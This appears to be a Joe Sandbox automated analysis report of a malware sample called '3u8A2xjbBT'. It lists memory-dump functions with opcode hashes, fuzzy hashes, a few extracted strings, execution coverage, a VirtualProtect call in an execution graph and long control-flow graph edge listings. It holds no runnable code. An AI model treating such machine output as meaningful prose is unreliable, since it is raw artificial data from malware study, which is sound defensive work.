                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98d71465b486814ebe7d61befff3413106f4fdf3eee9e96b00372e7b179ff4ec
                                      • Instruction ID: 51e490d46ac348817ee05009c7028b9016deb28f65e49319033de1acf18e4eb2
                                      • Opcode Fuzzy Hash: 98d71465b486814ebe7d61befff3413106f4fdf3eee9e96b00372e7b179ff4ec
                                      • Instruction Fuzzy Hash: 07621BB06003019FE748DF59D45876A7AE6FBC4308F24C59C80099F396CBBAE90B9BD5
                                      Function 0BBEC738 Relevance: .4, Instructions: 412COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2e8fb299d989b62b38e3de7795c455ef6ebd03c6a2c48491cecc060089873c9
                                      • Instruction ID: 6bbdca0720a6fe6f4177d2e838651b4661bdb972486d40438d94ff35232c9313
                                      • Opcode Fuzzy Hash: f2e8fb299d989b62b38e3de7795c455ef6ebd03c6a2c48491cecc060089873c9
                                      • Instruction Fuzzy Hash: B302C270D00229CFDB24DFA8C981BADBBB1FF49300F1095AAD419B7260EB749A85CF55
                                      Function 0B6B32E8 Relevance: .2, Instructions: 248COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5009a7a36083d8426e2694e0777d2b5fbd9b3f87a3b9f8b1f070092ce51fe35b
                                      • Instruction ID: a3d7f13e7b49bd48c8a8d8df0322dda83818e107c65b4e0313c8ed968289c63b
                                      • Opcode Fuzzy Hash: 5009a7a36083d8426e2694e0777d2b5fbd9b3f87a3b9f8b1f070092ce51fe35b
                                      • Instruction Fuzzy Hash: 18A128B1E09649DBCB14CFA9D5409DEFBB5FB89300F20952AC426BB354DB349982CF19
                                      Function 0B6B32D8 Relevance: .2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c61dd7cf6fb7314ffe38e3ee58d393b5669a62f361fa488fdb79f222706a1b66
                                      • Instruction ID: 2601920015c6a22e5d3a6a743b8974c3b670754dcae75d818968cec7045cd546
                                      • Opcode Fuzzy Hash: c61dd7cf6fb7314ffe38e3ee58d393b5669a62f361fa488fdb79f222706a1b66
                                      • Instruction Fuzzy Hash: 51A118B1E09649DBCB14CFA9D5409EEFBF1BB89300F21952AC426B7354DB349982CF19
                                      Function 01665430 Relevance: .2, Instructions: 180COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 13041ba2981aaf0d5cd4b1ac4b9d7cd60fd5d5bd187d1953fd1d6074a27b55cd
                                      • Instruction ID: 99d8e6e351e9b6a960dc86061da9fbb3d90f0316dccd76019478a5d07fe55388
                                      • Opcode Fuzzy Hash: 13041ba2981aaf0d5cd4b1ac4b9d7cd60fd5d5bd187d1953fd1d6074a27b55cd
                                      • Instruction Fuzzy Hash: 9F811134E15209AFCB04CFA9D88199EFBF1FF88350F14956AE415AB364D734AA02CF91
                                      Function 01665421 Relevance: .2, Instructions: 178COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ebf64cbdb119b715ee1fb6e5d28423df8c8bfcbf154dfab86aa1a96e0430c06
                                      • Instruction ID: 98249c1f3ef5ce478443b27f7bfda717c9ac648c0ff20e9c340eac4dd6c91624
                                      • Opcode Fuzzy Hash: 4ebf64cbdb119b715ee1fb6e5d28423df8c8bfcbf154dfab86aa1a96e0430c06
                                      • Instruction Fuzzy Hash: B8811134E152099FCB04CFA9D88199EFBF1FF88350F14946AE415AB364D734AA41CF91
                                      Function 0166A3A2 Relevance: .2, Instructions: 175COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35556d443d69024fc6a6d1e5a04e3b28a046688b32745c93c239942bd0e62ed0
                                      • Instruction ID: c7924e81a7316834e13dd617599174180e8abf55994ca65df157093f112f3b54
                                      • Opcode Fuzzy Hash: 35556d443d69024fc6a6d1e5a04e3b28a046688b32745c93c239942bd0e62ed0
                                      • Instruction Fuzzy Hash: FB7113B0E05219CFCB18CFE9D984AEEBBB2FB88310F10952AD516BB254D7349945CF25
                                      Function 01665F60 Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f35d5757ebef33c9188a5ae670cc393beb1832d71fcb63ba979546ee9ba68c9
                                      • Instruction ID: 0aa2b637d27491dd04e9f8084add3d69201ef251a9ba003329452bf15391ebe0
                                      • Opcode Fuzzy Hash: 8f35d5757ebef33c9188a5ae670cc393beb1832d71fcb63ba979546ee9ba68c9
                                      • Instruction Fuzzy Hash: 2571E2B4E0420ADFCB44CF99D9819AEFBB6FF88350F14951AD416AB314D730A982CF95
                                      Function 01665F50 Relevance: .2, Instructions: 155COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 136dd5e1ea0541c6b53d83daff049327899f32d8779947fabe853961fe1ff9e7
                                      • Instruction ID: 8801260fcaa5153df458282177c03f548a4543427b35ae94c85309116514040b
                                      • Opcode Fuzzy Hash: 136dd5e1ea0541c6b53d83daff049327899f32d8779947fabe853961fe1ff9e7
                                      • Instruction Fuzzy Hash: 956106B4E0420ADFCB44CF99D9819AEFBB6FF88350F14855AD416AB315D330A982CF95
                                      Function 0B6B3BA8 Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9aecceb3958446f49430f259eb451b0571cf64f24c9bd3426a83344e55029bb0
                                      • Instruction ID: dd8786830cba080b6025a2ac45a91373289dcb40d62c913acac78eaa36404856
                                      • Opcode Fuzzy Hash: 9aecceb3958446f49430f259eb451b0571cf64f24c9bd3426a83344e55029bb0
                                      • Instruction Fuzzy Hash: 2251F6B4F05219CBDB54CFA5D940ADDBBF2FB88200F2094AAD51ABB354D7309A85CF19
                                      Function 0B6B3B1A Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84d1ec674ff330e351de52bf06bd6833953fe47e1375eef5a928e7b8f5e9ecc2
                                      • Instruction ID: 6892fecc27201a90c68385154d67291fdca3b9580b01aeb57ab755b5716fb78d
                                      • Opcode Fuzzy Hash: 84d1ec674ff330e351de52bf06bd6833953fe47e1375eef5a928e7b8f5e9ecc2
                                      • Instruction Fuzzy Hash: 7A415AB4F15209CBDB54CFA5C5449DDFBF2EB88201F24946AC11AFB358D730AA468F18
                                      Function 0166ADF4 Relevance: .1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 214b10ff7dd5f7848e0bf9f69a804e15ce3274b71d9a94644be6e9173d8b32a5
                                      • Instruction ID: bfe90dbcece4fa296b0deffd975e4e1df577d1281b059a1582656adaafbb1961
                                      • Opcode Fuzzy Hash: 214b10ff7dd5f7848e0bf9f69a804e15ce3274b71d9a94644be6e9173d8b32a5
                                      • Instruction Fuzzy Hash: 6B51ECB4D003488FDB24CFA9D985B9EBBF5BB09300F20952AE825BB394D7759885CF45
                                      Function 0166AE00 Relevance: .1, Instructions: 123COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62da8cf2407718c31d03fb38c963705d93a34106e651524ffd38f782b6ff0a93
                                      • Instruction ID: 71e68c54d9d1a86a439614126d5381d1ae260edc40cec0d69a2893cc410341b6
                                      • Opcode Fuzzy Hash: 62da8cf2407718c31d03fb38c963705d93a34106e651524ffd38f782b6ff0a93
                                      • Instruction Fuzzy Hash: 8751DBB4D003489FDB24CFA9D985A9EBBF5AB09300F20952AE825BB394D7749845CF85
                                      Function 01666A69 Relevance: .1, Instructions: 121COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bb7c01e428df7a57e34fa94f658e4b7161194f0732e34edae474cd4148321b5
                                      • Instruction ID: 29875cde2a18b9ad77f17e3bd855913451367aabafb5fb752105dc322161e68d
                                      • Opcode Fuzzy Hash: 1bb7c01e428df7a57e34fa94f658e4b7161194f0732e34edae474cd4148321b5
                                      • Instruction Fuzzy Hash: A9511AB4E0520ADFCB04CFAAD9815AEFBF6FF88310F24D46AC405E7258D3349A558B94
                                      Function 0B6B3B51 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3fa11caa4f751502b74c28b1c7f5b04efa8772161c08d5828eb70252ccdd2708
                                      • Instruction ID: 20d90767a562d3bb683e7e8fd4d3148331de803b097a4a61ddb3fd37e04d73a9
                                      • Opcode Fuzzy Hash: 3fa11caa4f751502b74c28b1c7f5b04efa8772161c08d5828eb70252ccdd2708
                                      • Instruction Fuzzy Hash: B9415CB4F15209CBDB48CFA6C5409DDFBF2EB8C201F24946AC116EB318D731AD568B18
                                      Function 0B6B5D28 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f46ceb24a458cdd6b95334c3f901b1d445aa00a7468b3e661a4e4a07c4ac70b3
                                      • Instruction ID: 9de7b80d43f326dfa345d27bd6d306c8792069fab85c91a62a0cb5f66390bea6
                                      • Opcode Fuzzy Hash: f46ceb24a458cdd6b95334c3f901b1d445aa00a7468b3e661a4e4a07c4ac70b3
                                      • Instruction Fuzzy Hash: CC415EB0E15209CFDB54CFA5C554ADEFBF2EB98240F24882AC106F7354D7319E828B28
                                      Function 01666A78 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 815bb5c03776c1d67055f71597c58943a8a30c02cfe03749687db66d12002ec8
                                      • Instruction ID: bd2a91fb21846ea9c8a78fa740d5938049011a7b283453fc834ec6e37d0aa101
                                      • Opcode Fuzzy Hash: 815bb5c03776c1d67055f71597c58943a8a30c02cfe03749687db66d12002ec8
                                      • Instruction Fuzzy Hash: B65129B0E0520ADFCB04CFAAD9815AEFBF6FF88300F24D46AC405B7218D3349A458B94
                                      Function 0B6B5D13 Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06ae4e35275abf73768bc4879e6596f47df288f3ae1a366de8b14f89e0274584
                                      • Instruction ID: e96344257d107a88030c69f2d148e1b96e112218a9ed59520394cc649353d3de
                                      • Opcode Fuzzy Hash: 06ae4e35275abf73768bc4879e6596f47df288f3ae1a366de8b14f89e0274584
                                      • Instruction Fuzzy Hash: E8414EB0E15209CFDB54CFA5D564ADEFBF2EB98240F24886AC106F7354D7319E428B18
                                      Function 016698A8 Relevance: .1, Instructions: 101COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 690e360a5df90782ca32159758abd56afa27d1201291b8a38a1094bcc202e6ae
                                      • Instruction ID: bf50cdd8bbaf7f54e672d49b9dc7abfb040f2e9e5559b14f062b58698bed2f14
                                      • Opcode Fuzzy Hash: 690e360a5df90782ca32159758abd56afa27d1201291b8a38a1094bcc202e6ae
                                      • Instruction Fuzzy Hash: F341E274E01319DFDB18CFAAD984A9DBBF6BF88314F14812AD909AB354D7309942CF51
                                      Function 0166987C Relevance: .1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 412f2fb1980959eae76b4bcd0b219623a9392984f329ab40a7a53e5679b187b6
                                      • Instruction ID: e6b76962cfb6e7138116c48124ff78bb6b5ffd73e9744479e25f1dc2b38202a4
                                      • Opcode Fuzzy Hash: 412f2fb1980959eae76b4bcd0b219623a9392984f329ab40a7a53e5679b187b6
                                      • Instruction Fuzzy Hash: 4841F474E05319CFEB19CFA9D884A9EBBF2BF88314F14816AD809AB355D7349942CF50
                                      Function 0B6B5DB1 Relevance: .1, Instructions: 91COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e57c1bd957d07f4e3c6475d8f232c11b8035913639a2ad4a5dd7d7e2ac331046
                                      • Instruction ID: 732feb3ad9a68d65124cad45ee26a392d63114e5bc844be98d2c22577edf7304
                                      • Opcode Fuzzy Hash: e57c1bd957d07f4e3c6475d8f232c11b8035913639a2ad4a5dd7d7e2ac331046
                                      • Instruction Fuzzy Hash: F43160B0E05209CFDB44CFA5D564ADEFBF2EB99200F24842AC116B7354D7719E868F29
                                      Function 0B6B5D9C Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 340c32909395132aa9684e2dd8123529028b5515c73042920fc1a46d6eaf954a
                                      • Instruction ID: 18abf5927524e682701df05e824ae980e708ebae3ec28b4dd8dfcc525726d9a0
                                      • Opcode Fuzzy Hash: 340c32909395132aa9684e2dd8123529028b5515c73042920fc1a46d6eaf954a
                                      • Instruction Fuzzy Hash: 39314FB0E05209CFDB54CFA5D560ADEFBF2AB98200F24846AC116F7358D7719D868F25
                                      Function 0BBE7308 Relevance: 6.6, Strings: 5, Instructions: 388COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4cq$Hq$Hq$cq$cq
                                      • API String ID: 0-1334146734
                                      • Opcode ID: e90152e717f4d150fe7e68633e85c4d68a17698782b625fd398f2af0e9cd294c
                                      • Instruction ID: 01260d1e4b375e42012de5312eea2530c186e7528ef42fc431ea8aea817f7c57
                                      • Opcode Fuzzy Hash: e90152e717f4d150fe7e68633e85c4d68a17698782b625fd398f2af0e9cd294c
                                      • Instruction Fuzzy Hash: 5CE1D230B04246DFC705AFB5D4510ADBBF1BF9530071489AED8A6AB361EF30AD85C7A1
                                      Function 0BBE51F8 Relevance: 6.5, Strings: 5, Instructions: 287COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$(Tt$^\t$$q
                                      • API String ID: 0-3152500879
                                      • Opcode ID: f00db3bc018ae94ecb55e64ac653d6b6f1a42ce9b6e91c0936332864ab52034f
                                      • Instruction ID: 22bf0d785321ef6b3300ad5dbb2edb1bc333aaa7e0d91906a2aecbb7dd809a1a
                                      • Opcode Fuzzy Hash: f00db3bc018ae94ecb55e64ac653d6b6f1a42ce9b6e91c0936332864ab52034f
                                      • Instruction Fuzzy Hash: 63B14D70B002049FDB59DBA9D594A6EBBE3FFCC600B148569D40ADB394DF34ED028BA1

                                      Execution Graph

                                      Execution Coverage:13.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 15345 2a1afe0 15346 2a1b02d VirtualProtect 15345->15346 15347 2a1b098 15346->15347

                                      Executed Functions

                                      Function 0530F760 Relevance: 1.6, Strings: 1, Instructions: 393COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 367 530f760-530f78b 368 530f792-530f7c5 367->368 369 530f78d 367->369 370 530f7c6 368->370 369->368 371 530f7cd-530f7e9 370->371 372 530f7f2-530f7f3 371->372 373 530f7eb 371->373 394 530f82f-530f853 372->394 373->370 373->372 374 530fb50 373->374 375 530faf1-530fb0d 373->375 376 530fa72-530fa85 373->376 377 530f9b3 373->377 378 530f854 373->378 379 530f914-530f935 373->379 380 530f7f5-530f82d 373->380 381 530f93a-530f97f call 2a1ff30 373->381 382 530f9fb-530fa3a 373->382 383 530f8fc-530f90f 373->383 384 530f8bd-530f8f7 373->384 385 530fb9d 373->385 386 530fb7f-530fb9b 373->386 387 530f9e2-530f9f9 373->387 388 530fac2 373->388 389 530fa43 373->389 390 530faa4-530fac0 373->390 391 530f886-530f8a6 373->391 392 530fa87-530faa2 373->392 393 530f8a8-530f8bb 373->393 373->394 395 530fb0f 373->395 400 530fb57-530fb73 374->400 399 530fac9-530fae5 375->399 397 530fa4a-530fa66 376->397 401 530f9ba-530f9d6 377->401 396 530f85b-530f877 378->396 379->396 380->371 454 530f985-530f9b2 381->454 382->389 383->396 384->396 421 530fc59 385->421 386->400 387->401 388->399 389->397 390->388 390->395 391->396 392->397 393->396 394->378 395->374 417 530f880-530f881 396->417 418 530f879 396->418 403 530fa68 397->403 404 530fa6f-530fa70 397->404 408 530fae7 399->408 409 530faee-530faef 399->409 413 530fb75 400->413 414 530fb7c-530fb7d 400->414 415 530f9d8 401->415 416 530f9df-530f9e0 401->416 403->374 403->375 403->376 403->385 403->386 403->388 403->389 403->390 403->392 403->395 403->404 403->421 423 530fd78-530fd8b 403->423 424 530fcba 403->424 425 530fcdf 403->425 426 530fd40 403->426 427 530fca5-530fcb8 403->427 428 530fda6-530fdb6 403->428 429 530fc88-530fca3 403->429 430 530fd49 403->430 431 530fd2b-530fd3e 403->431 432 530fd8d-530fda4 403->432 433 530fd0e-530fd29 403->433 404->390 408->374 408->375 408->385 408->386 408->388 408->395 408->409 408->421 408->423 408->424 408->425 408->426 408->427 408->428 408->429 408->430 408->431 408->432 408->433 409->395 413->374 413->385 413->386 413->414 413->421 413->423 413->424 413->425 413->426 413->427 413->428 413->429 413->430 413->431 413->432 413->433 414->385 415->374 415->375 415->376 415->377 415->382 415->385 415->386 415->387 415->388 415->389 415->390 415->392 415->395 415->416 415->421 415->423 415->424 415->425 415->426 415->427 415->428 415->429 415->430 415->431 415->432 415->433 416->382 417->381 418->374 418->375 418->376 418->377 418->378 418->379 418->381 418->382 418->383 418->384 418->385 418->386 418->387 418->388 418->389 418->390 418->391 418->392 418->393 418->395 418->417 418->421 434 530fc60-530fc7c 421->434 441 530fd50-530fd6c 423->441 424->425 439 530fce6-530fd02 425->439 426->430 427->434 429->434 430->441 431->439 432->441 433->439 436 530fc85-530fc86 434->436 437 530fc7e 434->437 436->424 437->421 437->423 437->424 437->425 437->426 437->427 437->428 437->429 437->430 437->431 437->432 437->433 437->436 445 530fd04 439->445 446 530fd0b-530fd0c 439->446 448 530fd75-530fd76 441->448 449 530fd6e 441->449 445->423 445->425 445->426 445->428 445->430 445->431 445->432 445->433 445->446 446->426 448->428 449->423 449->428 449->430 449->432 449->448 454->377
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 9141838911d75171bd04fcc6b08bff3b87be12861242c0875cf3dc94af0c576b
                                      • Instruction ID: 5f218fcd55a219a200fedc1534dbbad8ef5b0012d198bfd4ef6e23c7b983efc6
                                      • Opcode Fuzzy Hash: 9141838911d75171bd04fcc6b08bff3b87be12861242c0875cf3dc94af0c576b
                                      • Instruction Fuzzy Hash: DEF10674E19319CFCB14CFA5D9546ADBBF6BB89300F20A46AD40AEB354DB309E418F14
                                      Function 0530F750 Relevance: 1.6, Strings: 1, Instructions: 380COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 457 530f750-530f78b 459 530f792-530f7c5 457->459 460 530f78d 457->460 461 530f7c6 459->461 460->459 462 530f7cd-530f7e9 461->462 463 530f7f2-530f7f3 462->463 464 530f7eb 462->464 485 530f82f-530f853 463->485 464->461 464->463 465 530fb50 464->465 466 530faf1-530fb0d 464->466 467 530fa72-530fa85 464->467 468 530f9b3 464->468 469 530f854 464->469 470 530f914-530f935 464->470 471 530f7f5-530f82d 464->471 472 530f93a-530f96d 464->472 473 530f9fb-530fa3a 464->473 474 530f8fc-530f90f 464->474 475 530f8bd-530f8f7 464->475 476 530fb9d 464->476 477 530fb7f-530fb9b 464->477 478 530f9e2-530f9f9 464->478 479 530fac2 464->479 480 530fa43 464->480 481 530faa4-530fac0 464->481 482 530f886-530f8a6 464->482 483 530fa87-530faa2 464->483 484 530f8a8-530f8bb 464->484 464->485 486 530fb0f 464->486 491 530fb57-530fb73 465->491 490 530fac9-530fae5 466->490 488 530fa4a-530fa66 467->488 492 530f9ba-530f9d6 468->492 487 530f85b-530f877 469->487 470->487 471->462 543 530f976-530f97f call 2a1ff30 472->543 473->480 474->487 475->487 512 530fc59 476->512 477->491 478->492 479->490 480->488 481->479 481->486 482->487 483->488 484->487 485->469 486->465 508 530f880-530f881 487->508 509 530f879 487->509 494 530fa68 488->494 495 530fa6f-530fa70 488->495 499 530fae7 490->499 500 530faee-530faef 490->500 504 530fb75 491->504 505 530fb7c-530fb7d 491->505 506 530f9d8 492->506 507 530f9df-530f9e0 492->507 494->465 494->466 494->467 494->476 494->477 494->479 494->480 494->481 494->483 494->486 494->495 494->512 514 530fd78-530fd8b 494->514 515 530fcba 494->515 516 530fcdf 494->516 517 530fd40 494->517 518 530fca5-530fcb8 494->518 519 530fda6-530fdb6 494->519 520 530fc88-530fca3 494->520 521 530fd49 494->521 522 530fd2b-530fd3e 494->522 523 530fd8d-530fda4 494->523 524 530fd0e-530fd29 494->524 495->481 499->465 499->466 499->476 499->477 499->479 499->486 499->500 499->512 499->514 499->515 499->516 499->517 499->518 499->519 499->520 499->521 499->522 499->523 499->524 500->486 504->465 504->476 504->477 504->505 504->512 504->514 504->515 504->516 504->517 504->518 504->519 504->520 504->521 504->522 504->523 504->524 505->476 506->465 506->466 506->467 506->468 506->473 506->476 506->477 506->478 506->479 506->480 506->481 506->483 506->486 506->507 506->512 506->514 506->515 506->516 506->517 506->518 506->519 506->520 506->521 506->522 506->523 506->524 507->473 508->472 509->465 509->466 509->467 509->468 509->469 509->470 509->472 509->473 509->474 509->475 509->476 509->477 509->478 509->479 509->480 509->481 509->482 509->483 509->484 509->486 509->508 509->512 525 530fc60-530fc7c 512->525 532 530fd50-530fd6c 514->532 515->516 530 530fce6-530fd02 516->530 517->521 518->525 520->525 521->532 522->530 523->532 524->530 527 530fc85-530fc86 525->527 528 530fc7e 525->528 527->515 528->512 528->514 528->515 528->516 528->517 528->518 528->519 528->520 528->521 528->522 528->523 528->524 528->527 536 530fd04 530->536 537 530fd0b-530fd0c 530->537 539 530fd75-530fd76 532->539 540 530fd6e 532->540 536->514 536->516 536->517 536->519 536->521 536->522 536->523 536->524 536->537 